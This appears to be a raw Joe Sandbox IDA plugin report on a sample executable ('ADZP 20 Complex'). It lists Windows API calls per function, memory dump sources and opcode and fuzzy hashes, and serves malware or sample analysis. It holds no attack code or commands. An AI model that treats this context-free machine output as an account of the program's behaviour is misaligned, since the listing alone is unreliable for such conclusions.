                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409973
                    • CloseHandle.KERNEL32(?,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040997E
                    • EnterCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 00409986
                    • LeaveCriticalSection.KERNEL32(00418730,?,?,00403DFC,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000), ref: 0040999A
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CloseHandle$CriticalSection$EnterLeave
                    • String ID:
                    • API String ID: 10009202-0
                    • Opcode ID: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                    • Instruction ID: e0bc3ded0607a690d6707024abf9d108a6c512657707c309f6689cc3689588ed
                    • Opcode Fuzzy Hash: 926b03219edff138682592b50218eb32bbb5e82e6177662db6676d56e49f664e
                    • Instruction Fuzzy Hash: 35F0FE32004600ABD3226F25DC08BABB7B5BF91355F15883EE055615B0CB796896DF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E967
                    • GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                    • wcscmp.MSVCRT ref: 004096C2
                    • memmove.MSVCRT ref: 004096DA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                    • String ID: \\?\
                    • API String ID: 2309408642-4282027825
                    • Opcode ID: 0fa9378e7acfbfa4384f3ad6efa90c035d6f5c5d5c6cb34ed41858775d4772d8
                    • Instruction ID: 45f2cbb32eb965b059acfe96771e330f3b1ba6a562bb2c4a442859e911d7a588
                    • Opcode Fuzzy Hash: 0fa9378e7acfbfa4384f3ad6efa90c035d6f5c5d5c6cb34ed41858775d4772d8
                    • Instruction Fuzzy Hash: 15F0E2B31002017AC2006777DC89CAB7BACEB853B4750093FF516E2491EA38D82486B8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: memset$memcpy
                    • String ID:
                    • API String ID: 368790112-0
                    • Opcode ID: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                    • Instruction ID: 1965f6ec6392bd57460d2593cd94e0dced67690f07481f5a959be489f1b8959c
                    • Opcode Fuzzy Hash: b0beb639d4b87296fea5d69f8c5fb0a7f200458fdca181524d22ac5a9409a4ef
                    • Instruction Fuzzy Hash: FD21D6727507083BE524AA29DC86F9F738CDB41708F50063EF241B62C1DA79E54546AD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeapwcsncpy
                    • String ID:
                    • API String ID: 2304708654-0
                    • Opcode ID: 18f9f6b2c25530330925e792ae8237d4e1f414d71162ef7611e6bfa166886baa
                    • Instruction ID: c5f2f283d94cb2b95ca38a154dbf8d05cc6d7144c7ec2ede7a16228095844b4d
                    • Opcode Fuzzy Hash: 18f9f6b2c25530330925e792ae8237d4e1f414d71162ef7611e6bfa166886baa
                    • Instruction Fuzzy Hash: F751BD34508B059BDB209F28D844A6B77F4FF84348F544A2EFC85A72D0E778E955CB89
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406696
                    • CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066D0
                    • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 004066FF
                    • CharLowerW.USER32(?,?,?,?,?,?,?,?,?,004026F1,00000000,00000000), ref: 00406705
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CharLower
                    • String ID:
                    • API String ID: 1615517891-0
                    • Opcode ID: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                    • Instruction ID: f3574eb3d9009b883351c62f390b1b458f0f5c76b551c27569f8cb84250b8306
                    • Opcode Fuzzy Hash: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                    • Instruction Fuzzy Hash: 0E2157796043158BC710EF5D9C40077B3A0EF80765F86887BFC85A3380DA39EE169BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D738,00000000), ref: 00412874
                    • malloc.MSVCRT ref: 00412884
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 004128A1
                    • malloc.MSVCRT ref: 004128B6
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidemalloc
                    • String ID:
                    • API String ID: 2735977093-0
                    • Opcode ID: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
                    • Instruction ID: e0c8a2120d9564889d2f3113141632f921e3b611a2b6a27c47ae7c2ad602c93a
                    • Opcode Fuzzy Hash: 8be09bc5dba933f52a62dcd4c1466ac7b9e98312e52af60236e0b5bb7a24d736
                    • Instruction Fuzzy Hash: 9E01453B34130127E3206699AC12FB73B59CB81B95F19017AFB009E2C0D6F3A80082B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412911
                    • malloc.MSVCRT ref: 00412921
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041293B
                    • malloc.MSVCRT ref: 00412950
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidemalloc
                    • String ID:
                    • API String ID: 2735977093-0
                    • Opcode ID: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
                    • Instruction ID: 3026177615c0ccb99804f522c9f73c57bab6efbcd972e36018b7209c0027a648
                    • Opcode Fuzzy Hash: dc45e273b66a9daf34e262ac0fef012b7e67277b67b23735523b4b314dffbbe5
                    • Instruction Fuzzy Hash: AB01F57734534127E3205699AD42FA77B59CB81BA5F19007AFB01AE2C0DAF7681086B8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SHGetFolderLocation.SHELL32(00000000,02209F70,00000000,00000000,00000000,00000000,00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?), ref: 0040AFFE
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040B00F
                    • wcslen.MSVCRT ref: 0040B01A
                    • CoTaskMemFree.OLE32(00000000,?,00000104,0040AF9B,00000000,00000000,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000), ref: 0040B038
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FolderFreeFromListLocationPathTaskwcslen
                    • String ID:
                    • API String ID: 4012708801-0
                    • Opcode ID: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
                    • Instruction ID: ea6acf64d2064cc2033e367344890d06019be10827a432285197bb32926cdf71
                    • Opcode Fuzzy Hash: 6faf2d54f5b57ee11cbd029bcc5efc3640db8cf73aecbbbd6fb1dba8edde6915
                    • Instruction Fuzzy Hash: BBF08136500615BAC7205F6ADC0DDAB7B7CEF15BA07404226F805E6260E7319910D7E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 004053E4: EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 004053EF
                      • Part of subcall function 004053E4: LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405422
                    • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
                    • EnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
                    • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040546C
                      • Part of subcall function 0040E1B2: HeapFree.KERNEL32(00000000,-00000008,0040DACB,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E1EB
                    • LeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                    • String ID:
                    • API String ID: 85618057-0
                    • Opcode ID: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                    • Instruction ID: 2660d4446155f5fb089545407d2c8513ff3ad75f9eb032afb91e50ebd33cab77
                    • Opcode Fuzzy Hash: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                    • Instruction Fuzzy Hash: 05F0E233404610FBC6205B619C49EE77779EF55767724883FF94172291CB386841CE6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409BAF,?), ref: 004099D6
                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,00409BAF,?), ref: 004099E2
                    • DuplicateHandle.KERNEL32(00000000,?,?,00409BAF,?), ref: 004099E9
                    • CloseHandle.KERNEL32(?,?,?,00409BAF,?), ref: 004099F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CurrentHandleProcess$CloseDuplicate
                    • String ID:
                    • API String ID: 1410216518-0
                    • Opcode ID: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                    • Instruction ID: ce6dac3176af70590056e0be6dcfbc27d6d18e8bdc9d520293d6dd9450c8e6f1
                    • Opcode Fuzzy Hash: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                    • Instruction Fuzzy Hash: 73E0ED75608209BFEB10DF91DC49F9ABB7DEB44741F104065F905D2660EB71AD11CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                      • Part of subcall function 00402E49: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402E71
                      • Part of subcall function 00402E49: __fprintf_l.LIBCMT ref: 00402ECB
                      • Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
                      • Part of subcall function 00409355: memset.MSVCRT ref: 00409381
                      • Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                      • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                      • Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                      • Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
                      • Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
                      • Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
                      • Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
                      • Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                      • Part of subcall function 00403E37: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A0D,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403E67
                    • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 00403178
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                    • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,02208F10,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 004031DD
                      • Part of subcall function 00402C55: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402CF0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
                    • String ID: $pA
                    • API String ID: 790731606-4007739358
                    • Opcode ID: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
                    • Instruction ID: e60bee266b2990c05e42038f4eaf1cd2a2725b994cf9f5ea8c77fc408b4d2e90
                    • Opcode Fuzzy Hash: 64ebd7b317967dc0aa4780699e57154d7a3f4f596edfabaaa6cc53898b52652e
                    • Instruction Fuzzy Hash: 6851E6B9601204BEE500BBB39D82D7F266DDBC471CB108C3FB440A50D3E93CAE65662E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0040254F
                    • PathRemoveArgsW.SHLWAPI(?), ref: 00402585
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 004099A5: SetEnvironmentVariableW.KERNEL32(02209F70,02209F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                      • Part of subcall function 0040E5F0: RtlFreeHeap.NTDLL(02200000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                    • String ID: *pA
                    • API String ID: 1199808876-3833533140
                    • Opcode ID: dffdd5ba53270b8295326c032e0582dd1a13c4ab5ce676133e23ebaef934a0d5
                    • Instruction ID: beb9823a99ae011e4ed5f1d055ef6d1d692690281f772a57edd19b399da9bd76
                    • Opcode Fuzzy Hash: dffdd5ba53270b8295326c032e0582dd1a13c4ab5ce676133e23ebaef934a0d5
                    • Instruction Fuzzy Hash: E541E9B5504301BED600BBB39D8293F76A8EBC471CF508C3FB444A61D2EA3CD9655A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040D968: TlsGetValue.KERNEL32(?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D96F
                      • Part of subcall function 0040D968: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D98A
                      • Part of subcall function 0040D968: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D999
                    • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DBC,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$AllocCommandHeapLine
                    • String ID: $"
                    • API String ID: 1339485270-3817095088
                    • Opcode ID: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                    • Instruction ID: 229198f1d41a65a6e9ffff917a794aecd7294c87f6384db1244c7b0cd665179e
                    • Opcode Fuzzy Hash: 9f13aeb594c8651f773918aba712108c6ee6300c7051426f9c00fbcbc60952a7
                    • Instruction Fuzzy Hash: 3131A6735252218ADB64AF10981127772A1EFA2B60F18C17FE4926B3C2F37D4D41D369
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: _wcsicmpwcscmp
                    • String ID: $0A
                    • API String ID: 3419221977-513306843
                    • Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                    • Instruction ID: a9c09230f7291aa91694be4cadd9aa4df44d847ede942287367b49c05577748a
                    • Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
                    • Instruction Fuzzy Hash: 39118F76508B018BD3209F56D440913B3F9EF94364329893FD88963790DB76EC658BAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405722
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401218), ref: 00405746
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID: $0A
                    • API String ID: 626452242-513306843
                    • Opcode ID: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
                    • Instruction ID: 6633c5b8762e659e7e7445bcc2ebba2587ddb8769fcb30c67f307584ac15d0df
                    • Opcode Fuzzy Hash: 73ef42fd297e56149542e4ba10b5f7343afa2e9a126b30dcd6987e1077dc572a
